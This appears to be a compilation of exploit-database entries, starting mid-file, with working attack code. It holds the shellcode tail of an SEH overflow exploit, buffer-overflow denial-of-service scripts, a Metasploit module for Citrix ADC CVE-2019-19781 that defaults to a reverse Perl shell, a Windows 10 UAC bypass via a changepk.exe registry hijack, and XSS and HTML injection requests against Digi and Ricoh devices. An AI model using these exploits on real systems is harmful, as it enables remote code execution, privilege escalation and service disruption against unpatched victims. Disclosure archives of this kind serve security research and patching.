b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52" shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95" shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22" shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73" shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b" shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2" shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92" shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a" shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74" shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37" shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28" shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60" shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc" shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59" shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4" shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47" poc = "" poc += "A"*nseh_offset poc += "\xEB\x0b\x90\x90" # jmp forward (nseh) poc += "\x11\x7b\x03\x10" # pop pop ret (seh) poc += "\x90"*20 poc += shellcode_calc poc += "D"*(total - len(poc)) file = open("poc_seh.txt","w") file.write(poc) file.close()

# Exploit Title: Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: https://www.top-password.com/ # Software Link: https://www.top-password.com/download/FirefoxPRSetup.exe # Version: 2.8 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the # User Name / Registration Code input fields. #!/usr/bin/python poc =3D "A"*5000 file =3D open("poc.txt","w") file.write(poc) file.close()

# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : https://www.digitalvolcano.co.uk/ # Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install TaskCanvas 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Registration -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Registration' and click on 'Ok' 6.TaskCanvas Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Citrix ADC Remote Code Execution', 'Description' => %q( An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. ), 'Author' => [ 'RAMELLA Sébastien' # https://www.pirates.re/ ], 'References' => [ ['CVE', '2019-19781'], ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], ['EDB', '47901'], ['EDB', '47902'] ], 'DisclosureDate' => '2019-12-17', 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl meterpreter' } }, 'Targets' => [ ['Unix (remote shell)', 'Type' => :cmd_shell, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl', 'DisablePayloadHandler' => 'false' } ], ['Unix (command-line)', 'Type' => :cmd_generic, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic', 'DisablePayloadHandler' => 'true' } ], ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } )) register_options([ OptAddress.new('RHOST', [true, 'The target address']) ]) register_advanced_options([ OptBool.new('ForceExploit', [false, 'Override check result', false]) ]) deregister_options('RHOSTS') end def execute_command(command, opts = {}) filename = Rex::Text.rand_text_alpha(16) nonce = Rex::Text.rand_text_alpha(6) request = { 'method' => 'POST', 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), 'headers' => { 'NSC_USER' => '../../../netscaler/portal/templates/' + filename, 'NSC_NONCE' => nonce }, 'vars_post' => { 'url' => 'http://127.0.0.1', 'title' => "[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]", 'desc' => 'desc', 'UI_inuse' => 'RfWeb' }, 'encode_params' => false } begin received = send_request_cgi(request) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end return false unless received if received.code == 200 vprint_status("#{received.get_html_document.text}") sleep 2 request = { 'method' => 'GET', 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), 'headers' => { 'NSC_USER' => nonce, 'NSC_NONCE' => nonce } } ## Trigger to gain exploitation. begin send_request_cgi(request) received = send_request_cgi(request) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end return false unless received return received end return false end def get_chr_payload(command) chr_payload = command i = chr_payload.length output = "" chr_payload.each_char do | c | i = i - 1 output << "chr(" << c.ord.to_s << ")" if i != 0 output << " . " end end return output end def check begin received = send_request_cgi( "method" => "GET", "uri" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') ) rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN print_error('Unable to connect on the remote target.') end if received && received.code != 200 return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit unless check.eql? Exploit::CheckCode::Vulnerable unless datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'The target is not exploitable.') end else print_good('The target appears to be vulnerable.') end case target['Type'] when :cmd_generic print_status("Sending #{datastore['PAYLOAD']} command payload") vprint_status("Generated command payload: #{payload.encoded}") received = execute_command(payload.encoded) if (received) && (datastore['PAYLOAD'] == "cmd/unix/generic") print_warning('Dumping command output in parsed http response') print_good("#{received.get_html_document.text}") else print_warning('Empty response, no command output') return end when :cmd_shell print_status("Sending #{datastore['PAYLOAD']} command payload") vprint_status("Generated command payload: #{payload.encoded}") execute_command(payload.encoded) end end end

# Exploit Title: Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass) # Author: Nassim Asrir # Date: 2019-01-10 # Exploit Author: Nassim Asrir # CVE: N/A # Tested On: Windows 10Pro 1809 # Vendor : https://www.microsoft.com # Technical Details # I discovered a Local Privilege Escalation in Windows 10 (UAC Bypass), via an auto-elevated process. # The executable is changepk.exe. changepk is used to pass a new product key, you can pass the key also via commandline. # By executing changepk.exe and tracing the process we can see some RegOpenKey operations that lead to open some non-found Key in the registry (HKCU). # In our case we can use "HKCU:\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" to spawn our Administrator cmd or to bypass the mmc UAC. # ntoskrnl.exe ObOpenObjectByNameEx + 0x32db 0xfffff8073106270b C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe RtlMapGenericMask + 0x2548 0xfffff80731090118 C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe ObOpenObjectByNameEx + 0x1bd9 0xfffff80731061009 C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe ObOpenObjectByNameEx + 0x1df 0xfffff8073105f60f C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe SeCaptureSubjectContextEx + 0x7c8 0xfffff8073105dc98 C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe SeCaptureSubjectContextEx + 0x51f 0xfffff8073105d9ef C:\WINDOWS\system32\ntoskrnl.exe # ntoskrnl.exe setjmpex + 0x78e5 0xfffff80730bd9c05 C:\WINDOWS\system32\ntoskrnl.exe # ntdll.dll ZwOpenKeyEx + 0x14 0x7ff877501a94 C:\Windows\System32\ntdll.dll # KernelBase.dll RegEnumKeyExW + 0x4c5 0x7ff874161655 C:\Windows\System32\KernelBase.dll # KernelBase.dll MapPredefinedHandleInternal + 0xca5 0x7ff874162fb5 C:\Windows\System32\KernelBase.dll # KernelBase.dll RegOpenKeyExInternalW + 0x141 0x7ff874161fa1 C:\Windows\System32\KernelBase.dll # KernelBase.dll RegOpenKeyExW + 0x19 0x7ff874161e49 C:\Windows\System32\KernelBase.dll # SHCore.dll SHGetValueW + 0x8c 0x7ff87469bfcc C:\Windows\System32\SHCore.dll # shell32.dll Ordinal790 + 0xb282 0x7ff87532fd22 C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xad56 0x7ff87532f7f6 C:\Windows\System32\shell32.dll # shell32.dll SHChangeNotification_Lock + 0x2b8 0x7ff8753a2a58 C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xb0cb 0x7ff87532fb6b C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xa254 0x7ff87532ecf4 C:\Windows\System32\shell32.dll # shell32.dll Ordinal790 + 0xa7c6 0x7ff87532f266 C:\Windows\System32\shell32.dll # shell32.dll Shell_NotifyIconW + 0x1695 0x7ff875349c75 C:\Windows\System32\shell32.dll # shell32.dll SHGetFileInfoW + 0x18a5 0x7ff87536a8c5 C:\Windows\System32\shell32.dll # shell32.dll SignalFileOpen + 0x33b 0x7ff8753a140b C:\Windows\System32\shell32.dll # shell32.dll SignalFileOpen + 0x25b 0x7ff8753a132b C:\Windows\System32\shell32.dll # shell32.dll Ordinal99 + 0x9c6 0x7ff87534ff96 C:\Windows\System32\shell32.dll # shell32.dll SHGetSpecialFolderLocation + 0x28e 0x7ff8753bac5e C:\Windows\System32\shell32.dll # SHCore.dll Ordinal233 + 0x3c5 0x7ff8746ac315 C:\Windows\System32\SHCore.dll # kernel32.dll BaseThreadInitThunk + 0x14 0x7ff875087974 C:\Windows\System32\kernel32.dll # ntdll.dll RtlUserThreadStart + 0x21 0x7ff8774ca271 C:\Windows\System32\ntdll.dll # Exploit # To exploit the vulnerability you can use this python code then execute it and you will get the Windows Activation just click Yes and you will redirect the execution to cmd.exe. # -*- coding: utf-8 -*- import os import sys import ctypes import _winreg import time print "Creating Registry Key ....." print "" time.sleep(3) def create_reg_key(key, value): try: _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command') registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\Launcher.SystemSettings\Shell\Open\Command', 0, _winreg.KEY_WRITE) _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) _winreg.CloseKey(registry_key) except WindowsError: raise print "Registry Key Created :)" print "" print "Inserting the command ...." time.sleep(3) print "" def exec_bypass_uac(cmd): try: create_reg_key('DelegateExecute', '') create_reg_key(None, cmd) except WindowsError: raise def bypass_uac(): try: current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__ cmd = "C:\windows\System32\cmd.exe" exec_bypass_uac(cmd) os.system(r'C:\windows\system32\changepk.exe') return 1 except WindowsError: sys.exit(1) if __name__ == '__main__': if bypass_uac(): print "Good job you got your Administrator cmd :)" # Don't Fogot: reg delete "HKCU\Software\Classes\Launcher.SystemSettings\Shell\Open\Command" /f

# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting # Date: 2019-11-10 # Exploit Author: Raspina Net Pars Group # Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb # Version: 1.93.21.19 # CVE : CVE-2019-18859 # PoC GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1 Host: Target User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 # Author Website: HTTPS://RNPG.info

# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path # Date: 2020-1-13 # Exploit Author: Amin Rawah # Vendor Homepage: https://www.vpnunlimitedapp.com # Version: 6.1 # Tested on: Windows 10 64bit C:\Users\Amin>sc qc VPNUnlimitedService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VPNUnlimitedService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VPN Unlimited Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: IBM RICOH 6400 Printer - HTML Injection # Date: 2020-01-02 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ibm.com/il-en # Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=649/ENUSA02-1405&appname=USN # Firmware Version: 1.1.26.3 # Vulernability Type: Code Injection # Vulenrability: HTML Injection # CVE: N/A # Description : # Ricoh InfoPrint 6400 devices allow /config?logpathConf.html # HTML Injection by authenticated users, as demonstrated by the 420 parameter. HTTP Request : POST /config?logpathConf.html HTTP/1.1 Host: SERVER User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 54 Origin: SERVER Authorization: Basic cm9vdDpyb290 Connection: close Referer: http://SERVER/config?logpathConf.html Upgrade-Insecure-Requests: 1 428=&420=%22%3E%3Cmarquee%3EIsmail+Tasdelen&548=5&564= HTTP Response : HTTP/1.0 200 OK Server: Microplex emHTTPD/1.0 Content-Type: text/html

# Exploit Title: IBM RICOH InfoPrint 6500 Printer - HTML Injection # Date: 2020-01-02 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ibm.com/il-en # Hardware Link: http://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-214 # Firmware Version: 1.4.40.10 # Vulernability Type: Code Injection # Vulenrability: HTML Injection # CVE: N/A # Description : # Ricoh InfoPrint 6500 devices allow /config?destConf.html # HTML Injection by authenticated users, as demonstrated by the 166 parameter. HTTP Request : POST /config?destConf.html HTTP/1.1 Host: SERVER User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 81 Origin: SERVER Authorization: Basic cm9vdDpyb290 Connection: close Referer: http://SERVER/config?destConf.html Upgrade-Insecure-Requests: 1 166=%22%3E%3Ch1%3EIsmail+Tasdelen&182=1&230=1&198=1&190=1&222=1&238=1&270=0&486=0 HTTP Response : HTTP/1.0 200 OK Server: Microplex emHTTPD/1.0 Content-Type: text/html

# Exploit Title: Redir 3.3 - Denial of Service (PoC) # Date: 2020-01-14 # Exploit Author: hieubl from HPT Cyber Security # Vendor Homepage: https://github.com/troglobit/redir # Software Link: https://github.com/troglobit/redir # Version: 3.3 # Tested on: Kali GNU/Linux Rolling 2019.4 # CVE : [if applicable] The source code of redir.c contains doproxyconnect() function which has the stack overflow vulnerability: void doproxyconnect(int socket) { int x; char buf[128]; /* write CONNECT string to proxy */ sprintf((char *)&buf, "CONNECT %s HTTP/1.0\n\n", connect_str); x = write(socket, (char *)&buf, strlen(buf)); if (x < 1) { syslog(LOG_ERR, "Failed writing to proxy: %s", strerror(errno)); exit(1); } /* now read result */ x = read(socket, (char *)&buf, sizeof(buf)); if (x < 1) { syslog(LOG_ERR, "Failed reading reply from proxy: %s", strerror(errno)); exit(1); } /* no more error checking for now -- something should be added later */ /* HTTP/1.0 200 Connection established */ } Download and build: # git clone https://github.com/troglobit/redir.git # cd redir # ./autogen.sh # ./configure # make Proof of Concept: In 1st terminal: # gdb -q ./redir # set follow-fork-mode child # r -x AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :1234 hpt.vn:80 In 2nd terminal: # nc localhost 1234 After that, the program in 1st terminal will crash because of buffer overflow vulnerability. ... ► 0x5555555571b0 <doproxyconnect+144> ret <0x4141414141414141> ... Program received signal SIGSEGV (fault address 0x0) pwndbg>